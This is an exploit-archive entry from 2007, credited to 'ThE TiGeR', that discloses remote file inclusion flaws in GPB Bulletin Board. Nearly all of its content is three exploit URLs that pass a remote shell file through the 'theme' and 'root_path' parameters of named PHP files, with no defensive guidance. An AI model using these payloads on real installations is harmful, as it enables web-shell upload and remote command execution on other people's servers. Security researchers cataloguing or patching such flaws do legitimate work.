id: 1792
date: 04/23/2007
title: GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities
author: ThE TiGeR
cves: 

=================================================================
GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities
=================================================================



#GPB bulletin board Remote file include                                                        

#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz

#D0rk : Download Script and install it in ur machine

#Exploit :

#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?

#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?

#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?

#Discovered by : ThE TiGeR




#  0day.today [2023-03-26]  #